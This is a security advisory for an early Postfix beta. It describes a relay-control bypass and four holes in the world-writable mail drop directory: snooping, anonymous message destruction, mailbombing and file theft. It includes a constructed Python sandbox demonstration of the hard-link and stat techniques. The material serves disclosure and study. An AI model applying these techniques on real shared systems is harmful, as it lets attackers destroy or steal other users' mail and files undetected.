COMMAND

    postfix

SYSTEMS AFFECTED

    Postfix Beta-19981211

PROBLEM

    Robert Keyes found this.  This bug affects the access control used
    by Postfix.  By subverting the access control mechanism, an
    attacker could use a Postfix server as a relay for SPAM (UCE).
    This can result in huge network load, having your server added to
    black-hole lists, denial of service attacks, and much abuse and
    frustration.

    In addition to the SPAM problem, the forged address that defeats
    the access check is also what appears in the system logs (although
    the IP address is also logged).  This could lead an unwary
    sysadmin to think that connections, and possible attacks, were
    coming from a place where they were not.

    D.J. Bernstein shed more light on this.  The IBM Secure Mailer,
    also known as Postfix, provides a mode-1777 (world-writable,
    sticky) directory for users to drop off queue files.  All incoming
    and outgoing messages pass through this mechanism.  This
    deliberate design decision leads to four obvious security holes,
    of varying levels of applicability and severity, as described
    here.  The nastiest one is #2: selective anonymous message
    destruction.

    1. Anonymous snooping
    =====================
    SECURITY HOLE: Any local user can stat() files in the IBM Secure
    Mailer drop directory.
    IMPACT: Any local user can anonymously inspect the uids and sizes
    of new messages.  It doesn't matter how well the system
    administrator has protected his process list, mail logs, and
    message transport mechanisms; private information is freely
    available in the IBM Secure Mailer queue.  One might naively
    respond that queued messages are visible for only a moment.
    However, the attacker can drastically slow down the IBM Secure
    Mailer (for example, by creating thousands of temporary files in
    the drop directory) to give himself ample time to look for queued
    messages.  Making the drop directory unreadable does not stop this
    attack, or even slow it down perceptibly: stat() needs only search
    (execute) permission on the directory, not read permission, and
    queue file names are easy to predict, so the attacker never has to
    list the directory.

    2. Anonymous message destruction
    ================================
    SECURITY HOLE: Any local user can make hard links to files in the
    IBM Secure Mailer drop directory.
    IMPACT: Under the IBM Secure Mailer, any local user can
    anonymously eliminate selected messages from the mail queue.  It
    is impossible to identify the culprit after the fact.  There are
    several ways to carry out this attack.  The attacker can, for
    example, create a temporary directory under a weird name inside
    the drop directory, and link the victim's message file to a new
    name inside the temporary directory.  The IBM Secure Mailer will
    then remove the original name because its link count is no longer
    one.  The attacker can then remove the new link and the temporary
    directory.  It is easy to avoid detection.

    3. Anonymous mailbombing
    ========================
    SECURITY HOLE: On (uncommon but still extant) UNIX variants that
    allow file giveaways (an unprivileged process may chown() its own
    file to another user), any local user can create files in the IBM
    Secure Mailer drop directory owned by another user.
    IMPACT: On UNIX variants that allow file giveaways, any local user
    can use the IBM Secure Mailer to send mail that is logged as
    another user.  This dodges mail accounting; it can be used to send
    anonymous mailbombs.  It is impossible to identify the culprit
    after the fact.  Other MTAs are careful to record the source of
    each local message.  They also attempt to record the source of
    remote messages, specifically the IP address and optional extra
    information supplied by the remote host; there are still some
    security holes here that permit anonymous mail (and mail
    destruction!), but all of those flaws will eventually be fixed by
    cryptographic techniques.

    4. File theft
    =============
    SECURITY HOLE: Any local user can make hard links into the IBM
    Secure Mailer drop directory from files visible elsewhere in the
    filesystem.
    IMPACT: An attacker can force the IBM Secure Mailer to send a
    victim's file as a mail message, under the following conditions:
    the file has mode 700; it is in a world-readable directory on the
    same filesystem as the drop directory (hard links cannot cross
    filesystems); it happens to have the right structure for an
    outgoing mail message; and it is removed by the victim.  There
    are, as above, several ways for the attacker to put the victim's
    file into the IBM Secure Mailer drop directory with the correct
    name and link count after the file is removed by the victim.
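    The following sandbox model, added here as an example and not code from
    Postfix or from Bernstein's post, walks through holes 1, 2 and 4 above
    in a throwaway directory.  The "pickup" function is an assumed model of
    a queue reader that trusts only a plain file with a single hard link
    and discards anything else, which is the behaviour the advisory
    attributes to the mailer; the queue-file names, message bodies and
    directory layout are constructed for the example.  Everything is
    created by one uid so that it runs stand-alone; on a real multi-user
    host the attacker, the victim and the mailer are different uids.

```python
# Sandbox model of the drop-directory holes above (constructed example; the
# pickup() behaviour is an ASSUMPTION modelled on the advisory, not Postfix).
import os
import stat
import tempfile

# Constructed sample data.
MESSAGE = b"From: alice\nTo: bob\n\nconstructed message body\n"
PRIVATE = b"From: alice\nTo: alice\n\nprivate notes\n"


def make_drop_dir(base):
    """A mode-1777 (world-writable, sticky) drop directory like the one the
    advisory describes: anyone may create names in it, only the owner of a
    name may remove it."""
    drop = os.path.join(base, "maildrop")
    os.mkdir(drop)
    os.chmod(drop, 0o1777)
    return drop


def submit(drop, name, body):
    """Local submission: a queue file under a predictable name, mode 600."""
    path = os.path.join(drop, name)
    with open(path, "wb") as f:
        f.write(body)
    os.chmod(path, 0o600)
    return path


def snoop(drop, name):
    """Hole 1: stat() on a predicted name needs only search (x) permission on
    the directory and nothing on the file, so it works even if the directory
    is made unreadable (mode 1733).  Returns (uid, size) of the message."""
    st = os.stat(os.path.join(drop, name))
    return st.st_uid, st.st_size


def pickup(path):
    """ASSUMED model of the queue reader: accept only a regular file with
    exactly one link; otherwise throw the queue entry away.
    Returns (status, body)."""
    st = os.lstat(path)
    if not stat.S_ISREG(st.st_mode):
        os.unlink(path)
        return "rejected: not a regular file", None
    if st.st_nlink != 1:
        os.unlink(path)
        return "rejected: link count %d" % st.st_nlink, None
    with open(path, "rb") as f:
        body = f.read()
    os.unlink(path)
    return "delivered", body


def destroy_message(drop, victim_path):
    """Hole 2: a second hard link to the victim's queue file, hidden in a
    scratch directory the attacker owns, raises its link count to 2, so the
    reader discards the message.  Returns (scratch_dir, alias)."""
    scratch = tempfile.mkdtemp(prefix=".", dir=drop)
    alias = os.path.join(scratch, "x")
    os.link(victim_path, alias)
    return scratch, alias


def remove_traces(scratch, alias):
    """Afterwards the attacker deletes its own link and directory."""
    os.unlink(alias)
    os.rmdir(scratch)


def hold_link(private_path, scratch):
    """Hole 4, step 1: while the victim still has the file, take a hard link
    to it.  (Current Linux with fs.protected_hardlinks=1 refuses this for a
    file the caller cannot read; the sandbox owns the file, so it succeeds.)"""
    hold = os.path.join(scratch, "hold")
    os.link(private_path, hold)
    return hold


def plant_as_queue_file(hold, drop, queue_name):
    """Hole 4, step 2: once the victim has removed the original, rename() the
    surviving link into the drop directory.  rename keeps the link count at
    1, so the reader sees a valid single-link queue file and sends it."""
    target = os.path.join(drop, queue_name)
    os.rename(hold, target)
    return target


def demo():
    """Run all three scenarios and return the observable results."""
    r = {}
    with tempfile.TemporaryDirectory() as base:
        drop = make_drop_dir(base)
        victim_msg = submit(drop, "00012345", MESSAGE)
        uid, size = snoop(drop, "00012345")
        r["snoop_uid_is_submitter"] = uid == os.getuid()
        r["snoop_size_matches"] = size == len(MESSAGE)

        scratch, alias = destroy_message(drop, victim_msg)
        r["destroy_status"] = pickup(victim_msg)[0]
        r["original_gone"] = not os.path.exists(victim_msg)
        remove_traces(scratch, alias)
        r["drop_dir_after"] = os.listdir(drop)

        home = os.path.join(base, "home")      # world-readable, same filesystem
        os.mkdir(home)
        private = os.path.join(home, "notes")
        with open(private, "wb") as f:
            f.write(PRIVATE)
        os.chmod(private, 0o700)
        scratch = tempfile.mkdtemp(prefix=".", dir=drop)
        hold = hold_link(private, scratch)
        r["theft_links_while_victim_has_file"] = os.stat(hold).st_nlink
        os.unlink(private)                       # the victim deletes the file
        status, body = pickup(plant_as_queue_file(hold, drop, "00012346"))
        r["theft_status"], r["theft_body"] = status, body
        os.rmdir(scratch)
    return r


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

    The link-count check is what the attacker is manipulating in both
    cases: in hole 2 a link is added to push the count above one, in
    hole 4 the victim's own removal brings it back down to one.  Note
    that the sticky bit on the drop directory is no obstacle, since the
    attacker only ever creates and removes names it owns.  The
    fs.protected_hardlinks sysctl on current Linux kernels blocks step 1
    of hole 4 for files the attacker cannot read, but it does nothing
    against holes 1 and 2, which only touch the attacker's own names and
    the victim's queue file inside the world-writable directory.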

SOLUTION

    Nothing yet.